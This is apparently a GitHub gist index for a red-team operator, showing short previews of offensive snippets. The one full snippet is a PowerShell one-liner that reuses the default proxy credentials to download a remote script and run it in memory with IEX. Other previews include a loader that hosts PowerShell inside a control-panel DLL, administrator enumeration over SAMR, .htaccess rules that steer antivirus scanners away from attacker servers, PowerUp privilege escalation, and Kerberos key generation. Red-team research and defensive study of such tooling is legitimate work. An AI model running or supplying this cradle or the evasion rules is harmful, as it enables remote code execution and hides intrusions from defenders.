Steve Borosh rvrsh3ll
rvrsh3ll
/ proxybypass.txt
Created
April 6, 2016 17:51
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell.exe -nop -c "`$wc = New-Object System.Net.Webclient; `$wc.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) Like Gecko'); `$wc.proxy= [System.Net.WebRequest]::DefaultWebProxy; `$wc.proxy.credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; IEX (`$wc.downloadstring('$URL'))" |
rvrsh3ll
/ cpl.cs
Created
November 12, 2017 23:19
— forked from NickTyrer/cpl.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Runtime.InteropServices; | |
| using RGiesecke.DllExport; | |
| using System.Collections.ObjectModel; | |
| using System.Management.Automation; | |
| using System.Management.Automation.Runspaces; | |
| using System.Text; | |
| public class Test | |
| { |
rvrsh3ll
/ lookupadmins.py
Created
September 3, 2017 10:37
— forked from ropnop/lookupadmins.py
Python script using Impacket to enumerate local administrators over SAMR
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # | |
| # Title: lookupadmins.py | |
| # Author: @ropnop | |
| # Description: Python script using Impacket to query members of the builtin Administrators group through SAMR | |
| # Similar in function to Get-NetLocalGroup from Powerview | |
| # Won't work against Windows 10 Anniversary Edition unless you already have local admin | |
| # See: http://www.securityweek.com/microsoft-experts-launch-anti-recon-tool-windows-10-server-2016 | |
| # | |
| # Heavily based on original Impacket example scripts written by @agsolino and available here: https://github.com/CoreSecurity/impacket |
rvrsh3ll
/ Mine-MostProfitableGeneric.ps1
Created
December 11, 2017 11:50
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Mine-MostProfitableCoin { | |
| # Modify to your appropriate miner's locations | |
| $ElectroneumMiner = "C:\Users\rvrsh3ll\Desktop\mining\Active_Miners\ccminer-x64-2.2.2-cuda9\ccminer-x64.exe" | |
| $MoneroMiner = "C:\Users\rvrsh3ll\Desktop\mining\Active_Miners\ccminer-x64-2.2.2-cuda9\ccminer-x64.exe" | |
| $BitCoinGoldMiner = "C:\Users\rvrsh3ll\Desktop\mining\Active_Miners\ccminer-x64-2.2.2-cuda9\ccminer-x64.exe" | |
| $MonaCoin = "C:\Users\rvrsh3ll\Desktop\mining\Active_Miners\xmr-stak-monero\xmr-stak.exe" | |
| # Modify to your public wallet's addresse's |
rvrsh3ll
/ .htaccess
Created
April 23, 2018 15:31
— forked from curi0usJack/.htaccess
Drop into your apache working directory to instantly redirect most AV crap elsewhere.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| RewriteEngine On | |
| # Uncomment the below line for verbose logging, including seeing which rule matched. | |
| #LogLevel alert rewrite:trace5 | |
| # BURN AV BURN | |
| # AWS Exclusions. Cloudfronted requests by default will have a UA of "Amazon Cloudfront". More info here: https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/header-caching.html#header-caching-web-device | |
| RewriteCond expr "-R '54.0.0.0/8'" [OR] | |
| RewriteCond expr "-R '52.0.0.0/8'" [OR] |
rvrsh3ll
/ converter.sh
Created
May 27, 2018 23:10
— forked from xdavidhu/converter.sh
Converter.sh, a bash script to convert domain lists to resolved IP lists without duplicates
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Converter.sh by @xdavidhu | |
| # This is a script inspired by the Bug Hunter's Methodology 3 by @Jhaddix | |
| # With this script, you can convert domain lists to resolved IP lists without duplicates. | |
| # Usage: ./converter.sh [domain-list-file] [output-file] | |
| echo -e "[+] Converter.sh by @xdavidhu\n" | |
| if [ -z "$1" ] || [ -z "$2" ]; then | |
| echo "[!] Usage: ./converter.sh [domain-list-file] [output-file]" | |
| exit 1 | |
| fi |
rvrsh3ll
/ ExampleActivator.java
Created
June 20, 2018 15:22
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package com.rvrsh3ll.osgi.shellme; | |
| import org.osgi.framework.BundleActivator; | |
| import org.osgi.framework.BundleContext; | |
| public class Activator implements BundleActivator { | |
| public void start(BundleContext context) throws Exception { | |
| System.out.println("Hi!"); | |
| } | |
| public void stop(BundleContext context) throws Exception { | |
| System.out.println("RIP"); | |
| } |
rvrsh3ll
/ CompileBundle.txt
Created
June 20, 2018 15:36
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| javac -d ../classes/ -cp ../lib/felix.jar com/rvrsh3ll/osgi/shellme/Activator.java | |
| jar -cmf MANIFEST.MF rvrsh3ll.jar -C ../classes com |
rvrsh3ll
/ Powerup.ps1
Last active
August 14, 2018 07:41
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| PowerUp aims to be a clearinghouse of common Windows privilege escalation | |
| vectors that rely on misconfigurations. See README.md for more information. | |
| Author: @harmj0y | |
| License: BSD 3-Clause | |
| Required Dependencies: None | |
| Optional Dependencies: None | |
| #> |
rvrsh3ll
/ Get-KerberosAESKey.ps1
Created
September 2, 2018 19:49
— forked from Kevin-Robertson/Get-KerberosAESKey.ps1
Generate Kerberos AES keys from a known password
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-KerberosAESKey | |
| { | |
| <# | |
| .SYNOPSIS | |
| Generate Kerberos AES 128/256 keys from a known username/hostname, password, and kerberos realm. The | |
| results have been verified against the test values in RFC3962, MS-KILE, and my own test lab. | |
| https://tools.ietf.org/html/rfc3962 | |
| https://msdn.microsoft.com/library/cc233855.aspx |
OlderNewer